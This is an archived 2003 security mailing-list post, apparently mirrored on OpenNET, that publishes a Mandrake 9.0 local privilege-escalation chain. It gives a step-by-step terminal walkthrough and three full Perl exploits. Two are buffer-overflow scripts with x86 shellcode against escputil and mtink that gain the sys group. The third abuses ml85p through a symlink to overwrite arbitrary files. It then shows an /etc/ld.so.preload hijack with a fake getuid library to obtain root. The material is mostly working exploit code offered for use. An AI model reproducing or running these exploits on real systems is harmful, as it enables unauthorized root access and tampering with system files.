The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Mandrake 9.0 local root exploit


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 27 Feb 2003 21:43:04 -0000
From: Priv8 Security <[email protected]>
To: [email protected]
Subject: Mandrake 9.0 local root exploit



------------------------------------------------------------------------------------------------------------------
 Priv8 Security - www.priv8security.com
 
 priv8mdk90.tar.gz - Mandrake 9.0 local root exploit

 Based on Idefense adv.
http://www.idefense.com/advisory/01.21.03.txt
 
 Greets to : coideloko, chroot-, xtc , M|ght, exitus,
overkill, blood_sucker, lkm, Brother
execk, printf, heap, diguin, n4rfy(nordico :ppp) and
all friends of Priv8 security.

OBS. My english sux...
------------------------------------------------------------------------------------------------------------------

 Ok, our goal is to get root by exploiting ml85p thats
suid root by default on mdk 9.0

[wsxz@localhost priv8]$ ls -l /usr/bin/ml85p
-rwsr-x---    1 root     sys         12344 Set 17 16:40
/usr/bin/ml85p*

 You can see that we gona need group sys to run it so
first lets get it. 
 
[wsxz@localhost priv8]$ ls -l /usr/bin/mtink
-rwxr-sr-x    1 lp       sys        132600 Set 17 16:40
/usr/bin/mtink*
[wsxz@localhost priv8]$ ls -l /usr/bin/escputil
-rwxr-sr-x    1 lp       sys         32088 Set 17 16:40
/usr/bin/escputil*

 We have two here that are vuln, mtink has a stack
overflow on env HOME and escputil
has a stack over too on command line arg, for more
details read idefense adv.

So here we go....
First we get gid sys by exploiting mtink or escputil, u
can choose what one u want to.

[wsxz@localhost priv8]$ id
uid=503(wsxz) gid=503(wsxz) grupos=503(wsxz)
[wsxz@localhost priv8]$ perl priv8mtink.pl
 Priv8security.com Mandrake 9 mtink local sys exploit!!
 usage: priv8mtink.pl offset
 Using address: 0xbffffa80
sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)

And now we can exploit ml85p

1 - Writing any file on system!!!

sh-2.05b$ perl priv8ml85p.pl /root/hi-there-Mr-root
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position: ffffffff
sh-2.05b$

Now we check if it worked....

[root@localhost root]# pwd
/root
[root@localhost root]# ls -l hi*
-rw-rw-rw-    1 root     sys             0 Fev 24 03:32
hi-there-Mr-root

2 - Geting root with it ;)

I will do the same thing on idefense adv, so lets do it..

sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)
sh-2.05b$ perl priv8ml85p.pl /etc/ld.so.preload
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position: ffffffff
sh-2.05b$ ls -l /etc/ld.so.preload
-rw-rw-rw-    1 root     sys             0 Feb 26 00:12
/etc/ld.so.preload
sh-2.05b$ cd /tmp
sh-2.05b$ echo 'int getuid(void) { return 0; }' > lib.c
sh-2.05b$ export PATH="/usr/bin:/usr/sbin:/sbin:/bin"
sh-2.05b$ gcc -fPIC -c /tmp/lib.c
sh-2.05b$ gcc -o /tmp/lib.so -shared /tmp/lib.o
sh-2.05b$ echo "/tmp/lib.so" > /etc/ld.so.preload
sh-2.05b$ su -
[root@localhost root]# id
uid=0(root) gid=0(root) grupos=0(root)

It worked, so take care what u ll write ok ;)
that's it.

------------------------------------------------------------------------------------------------------------------
priv8escputil.pl
------------------------------------------------------------------------------------------------------------------

#!/usr/bin/perl
######################################################
#Priv8security.com escputil local sys exploit.
#
#     Tested on Mandrake 9.0 only.
#     Based on
http://www.idefense.com/advisory/01.21.03.txt
#
#####################################################

                    $shellcode =
		    "\x31\xc0\xb0". #setregid(x,x) - where x = x03 sys gid
		    "\x03".    # x = x03 sys gid
		    "\x89\xc3\x89\xc1\xb0\x47\xcd\x80".#end setregid()
                   
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
                   
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
                    
		    $size = 1050;
                    $retaddr = 0xbffff4e0;
                    $nop = "\x90";
                    $offset = 0;

                    if (@ARGV == 1) {
                    $offset = $ARGV[0];
                    }
                    
		    print " Priv8security.com Mandrake 9 escputil local
sys exploit!!\n";
		    print " usage: $0 offset\n";
                    
		    for ($i = 0; $i < ($size - length($shellcode) - 4);
$i++) {
                    $buffer .= $nop;
                    }

                    $buffer .= $shellcode;

                    print " Using address: 0x",
sprintf('%lx',($retaddr + $offset)), "\n";

                    $newret = pack('l', ($retaddr +
$offset));

                    for ($i += length($shellcode); $i <
$size; $i += 4) {
                    $buffer .= $newret;
                    }

                    exec("/usr/bin/escputil -c -P
$buffer");

		    
------------------------------------------------------------------------------------------------------------------
priv8ml85p.pl
------------------------------------------------------------------------------------------------------------------

#!/usr/bin/perl
######################################################
#Priv8security.com ml85p local root exploit.
#
#      This exploit erase any file on system, u ll need
group sys to do it
#      so run priv8mtink.pl or priv8escputil.pl to get
it ;)
#     Tested on Mandrake 9.0 only.
#     Based on
http://www.idefense.com/advisory/01.21.03.txt
#
#####################################################

              if (@ARGV == 1) {
              
	      $file = $ARGV[0];
	      $b = "/tmp/ml85g";
              $b .= time();
              exec(umask 000);
	      system("ln -s $file '$b'");
              print "Lets write some files ok ;p\n";
	      print "Now just press enter....\n";
                 if  (system("/usr/bin/ml85p -s") == -1){
                      print "You cant run ml85p, check
if u have gid sys...\n";
		     }
	      exit(1);
             
	     } else {
             print "\n!!! Priv8security.com ml85p local
root exploit by wsxz !!!\n";
             print "    Usage: perl $0
file-to-overwrite\n\n";
             }


------------------------------------------------------------------------------------------------------------------


------------------------------------------------------------------------------------------------------------------
priv8mtink.pl
------------------------------------------------------------------------------------------------------------------

#!/usr/bin/perl
######################################################
#Priv8security.com mtink local sys exploit.
#
#     Tested on Mandrake 9.0 only.
#     Based on
http://www.idefense.com/advisory/01.21.03.txt
#
#####################################################

                    $shellcode2 =
		    "\x31\xc0\xb0". #setregid(x,x) - where x = x03 sys gid
		    "\x03".    # x = x03 sys gid
		    "\x89\xc3\x89\xc1\xb0\x47\xcd\x80".#end setregid()
                   
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
                   
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

		    $size = 1056;
		    $retaddr = 0xbffffa80;
                    $nop = "\x90";
                    $offset = 0;

                    if (@ARGV == 1) {
                    $offset = $ARGV[0];
                    }    
		    
		    print " Priv8security.com Mandrake 9 mtink local sys
exploit!!\n";
		    print " usage: $0 offset\n";

                    for ($i = 0; $i < ($size -
length($shellcode2) - 4); $i++) {
                    $buffer .= $nop;
                    }

                    $buffer .= $shellcode2;

                    print " Using address: 0x",
sprintf('%lx',($retaddr + $offset)), "\n";

                    $newret = pack('l', ($retaddr +
$offset));

                    for ($i += length($shellcode2); $i
< $size; $i += 4) {
                    $buffer .= $newret;
                    }

                    local($ENV{'HOME'}) = $buffer;
exec("/usr/bin/mtink");

------------------------------------------------------------------------------------------------------------------

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру